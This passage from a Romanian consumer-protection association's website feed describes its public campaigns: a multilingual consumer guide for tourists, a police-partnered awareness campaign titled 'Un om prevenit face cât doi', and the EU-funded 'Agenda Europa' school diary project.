variată, datorată diversităţii cadrului natural al României, şi sfera drepturilor şi obligaţiilor ce decurg din calitatea de consumator de servicii turistice pe teritoriul ţării noastre. Acest aspect a fost adesea complet neglijat în campaniile de promovare turistică întreprinse în trecut, aceasta traducându-se printr-o lipsă de informaţie ce ar fi avut rolul de a convinge turiştii străini că România este o destinaţie europeană sigură, incluzând ţara noastră în punctele de atracţie pentru vacanţele sau afacerile lor.

Prin informaţiile pe care le va cuprinde, „Paşaportul consumatorului de servicii turistice” va reprezenta un instrument util atât pentru cetăţenii care călătoresc în scopuri turistice, cât şi pentru cei care călătoresc în scopuri de afaceri, muncesc sau studiază pe teritoriul României, pentru că va oferi informaţii care se pot dovedi utile pentru soluţionarea anumitor probleme pe care aceştia le-ar putea întâmpina.

Ghidul va fi tipărit atât în toate limbile Statelor Membre ale UE (română, engleză, bulgară, cehă, daneză, estonă, finlandeză, franceză, germană, greacă, italiană, letonă, lituaniană, maghiară, malteză, olandeză, poloneză, portugheză, slovacă, slovenă, spaniolă, suedeză), cât şi în limbile rusă, turcă, arabă, ebraică.

Pe lângă materialul tipărit, în cadrul proiectului va fi realizat şi un portal care va conţine toate informaţiile cuprinse în ghid atât în format care să poată fi consultat on-line, cât şi ghidul în toate versiunile lingvistice în format care să poată fi descărcat. Portalul va fi realizat în limbile română şi engleză.

Pentru informaţii suplimentare despre proiect, vă rugăm să ne contactaţi.

A.N.P.C.P.P.S. România

tel./fax: 0368-441.158

office@anpcppsr.ro

Persoane de contact:

Nedelcu Mary Anca

Responsabil PR

regio

]]>
Campania Naţională “Un Om Prevenit Face cât doi” https://o9atitudine.ro/campanii/campania-nationala-un-om-prevenit-face-cat-doi/ Wed, 17 Jun 2009 08:40:59 +0000 http://o9atitudine.ro/?p=1482 A.N.P.C.P.P.S. România – Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din România împreună cu Inspectoratul General al Poliţiei Române au iniţiat o Campanie Naţională de Promovare a Drepturilor Legitime ale Consumatorilor: “Un om prevenit face cât doi” în unităţi comerciale tip hipermarket-uri, prin puncte de informare ale Centrelor de Consultanţă şi Informare a Consumatorilor – A.N.P.C.P.P.S. România, în spiritul recomandărilor Comisiei Uniunii Europene ca aceste centre de informare să fie în zonele cu aflux maxim al consumatorilor.

Programul îşi propune informarea consumatorilor cu privire la drepturile legitime de care aceştia beneficiază, pentru a contracara expansiunea produselor de calitate îndoielnică pe piaţa românească. În acast sens am gândit o strategie de conştientizare a consumatorilor referitor la drepturile legitime de care beneficiază.

Etapele strategice ale programului “UN OM PREVENIT FACE CÂT DOI”:

a)stabilirea parteneriatului strategic cu Inspectoratul General al Poliţiei Române – instituţia a fost de acord cu obiectivele proiectului şi cu modalitatea de implementare, şi a fost semnat un acord de parteneriat pentru demararea proiectului

b)proiectarea posterului “UN OM PREVENIT FACE CÂT DOI” şi a pliantului “Drepturile consumatorilor”, principalele materiale de informare şi conştientizare generală

c)realizarea pliantelor şi a posterelor necesare pentru derularea proiectului

d)demararea campaniilor de informare şi conştientizare, prin afişarea posterelor în marile centre comerciale din ţară, în secţiile de poliţie precum şi la scările blocurilor (aceasta prin implicarea poliţiştilor de proximitate care au deja relaţii cu asociaţiile de locatari, asigurând astfel acces la beneficiarii finali ai proiectului – cetăţenii consumatori)

e) realizarea unei instruiri a “multiplicatorilor de informaţie” referitor la drepturile consumatorilor

f) identificarea necesităţilor de informare a consumatorilor

g) realizarea de materiale de informare adaptate necesităţilor de informare identificate

h) stabilirea de parteneriate cu unităţi comerciale tip hipermarket-uri

i) proiectarea design-ului centrelor de informare şi consultanţă

j) realizarea mobilierului pentru centrele de consultanţă şi informare din hipermarket-uri

k) identificarea, angajarea şi pregairea personalului de deservire a centrelor de consultanţă şi informare din hipermarket-uri

Decizia nr. 4704/28.03.2007 a Consiliului Naţional al Audiovizualului prin care a fost aprobată difuzarea în regim de campanie socială, pe posturile de televiziune şi de radio naţionale şi locale, a clipului şi spotului Campaniei “1=2” – “Un om prevenit face cât doi!”  –> Click aici

Decizia nr. 632/18.01.2008 a Consiliului Naţional al Audiovizualului prin care a fost aprobată prelungirea difuzării în regim de campanie socială, pe posturile de televiziune şi de radio naţionale şi locale, a clipului şi spotului Campaniei Naţionale “Un om prevenit face cât doi” – “1=2”–> Click aici

Clipuri video:

1=2 (6 secunde – fara sunet – format .wmv)

1=2 (9 secunde – format .wmv)

1=2 (19 secunde – format .wmv)

]]> Campania Naţională de Educare şi Informare “Agenda Europa – E alegerea ta!” – 2008 – 2009 https://o9atitudine.ro/campanii/campania-nationala-de-educare-si-informare-agenda-europa-e-alegerea-ta-2008-2009/ Tue, 16 Jun 2009 08:21:51 +0000 http://o9atitudine.ro/?p=1362 Fundaţia Generation Europe – Bruxelles (www.generation-europe.org; www.generation-europe.ro), în parteneriat cu Institutul de Ştiinţe ale Educaţiei şi Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din România, derulează în România proiectul „Agenda Europa – E alegerea ta!”, proiect finanţat de Direcţia Generală de Sănătate şi Protecţia Consumatorului şi Direcţia Generală de Mediu din cadrul Comisiei Europene.

Proiectul Agenda Europa „E alegerea ta” este rezultatul eforturilor conjugate la nivel european, pentru ca tinerii să beneficieze de o educaţie fundamentală în domeniile sănătăţii, consumului şi protecţiei mediului. Proiectul este implementat în toate ţările membre ale Uniunii Europene şi are ca scop principal informarea şi pregătirea elevilor de liceu (15-18 ani) în ceea ce priveşte  Drepturile consumatorului – Protecţia mediului – Energie – Consum raţional – Cetăţenia activă –  valorile Uniunii Europene.

Agenda Europa 2008-2009 (format .pdf)

]]>
Campania Naţională de Educare şi Informare “Agenda Europa – E alegerea ta!” – 2007 – 2008 https://o9atitudine.ro/campanii/campania-nationala-de-educare-i-informare-agenda-europa-e-alegerea-ta-2007-2008/ Tue, 16 Jun 2009 08:19:19 +0000 http://o9atitudine.ro/?p=1478 Fundaţia Generation Europe – Bruxelles (www.generation-europe.org; www.generation-europe.ro), în parteneriat cu Institutul de Ştiinţe ale Educaţiei şi Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din România, derulează în România proiectul „Agenda Europa – E alegerea ta!”, proiect finanţat de Direcţia Generală de Sănătate şi Protecţia Consumatorului şi Direcţia Generală de Mediu din cadrul Comisiei Europene.

Proiectul Agenda Europa „E alegerea ta” este rezultatul eforturilor conjugate la nivel european, pentru ca tinerii să beneficieze de o educaţie fundamentală în domeniile sănătăţii, consumului şi protecţiei mediului. Proiectul este implementat în toate ţările membre ale Uniunii Europene şi are ca scop principal informarea şi pregătirea elevilor de liceu (15-18 ani) în ceea ce priveşte  Drepturile consumatorului – Protecţia mediului – Energie – Consum raţional – Cetăţenia activă –  valorile Uniunii Europene.

Proiectul se derulează în perioada  2006 –  2009 şi cuprinde elaborarea, editarea şi distribuirea: Agendei Europa „E alegerea ta!”; Ghidul profesorului; CD-ROM cu Training-ul profesorului.

Agenda Europa „E alegerea ta”  este o agendă practică, pentru completarea educaţiei şcolare, prin informarea corectă şi obiectivă a elevilor, cu scopul de a-i învăţa să-şi formeze şi să exprime opinii cu privire la probleme de interes public: cetăţenia activă, mediul înconjurător, sănătatea populaţiei, probleme de consum etc. Ea acoperă domenii precum Uniunea Europeană, drepturile consumatorilor, administrarea fondurilor proprii, reclamele, siguranţa utilizării Internet-ului, protecţia mediului, consumul raţional, etc.

Agenda susţine formarea capacităţii de a lua decizii întemeiate, ajutându-i pe tineri să aleagă în cunoştinţă de cauză, neinfluenţaţi şi pe deplin responsabili.

Ea contribuie la formarea unor cetăţeni activi şi la educaţia pentru dezvoltare durabilă, prin informarea tinerilor cu privire la efectele acţiunilor lor, în plan social, economic sau în raport cu mediul, dezvoltindu-le, tot odată,  competenţe de identificare şi de analiză a formelor de influenţare sau de manipulare prin media.

Agenda este şi un excelent instrument de informare şi de management al timpului – o metodă pentru organizarea şi proiectarea timpului de învăţare pe tot parcursul anului şcolar.

Ghidul profesorului este conceput ca un suport didactic în sprijinul profesorilor care vor coordona proiectul „Agenda Europa” la nivelul fiecărei clase de elevi.

De ce se elaborează aceste agende?  Consumul raţional este o problemă din ce în ce mai complexă. Multe subiecte, de la siguranţa produselor la economisirea apei şi a energiei, la reducerea materialelor reziduale, ne afectează pe toţi. Multe dintre aceste probleme trec dincolo de graniţele naţionale. Iată de ce Comisia Europeană ne-a cerut să realizăm această agendă, pentru a-i ajuta pe tinerii europeni să-şi înţeleagă drepturile şi responsabilităţile.

Agenda Europa „E alegerea ta!” este distribuită în şcoli, în toate cele 27 de ţări ale Uniunii Europene. Prima versiune românească a Agendei Europa a fost distribuită, anul trecut, unui număr de 125 000 de elevi, din 600 de şcoli. Anul acesta, dorim ca un număr de 140.000 de exemplare să fie distribuite elevilor din clasa a XI-a, din România.

]]>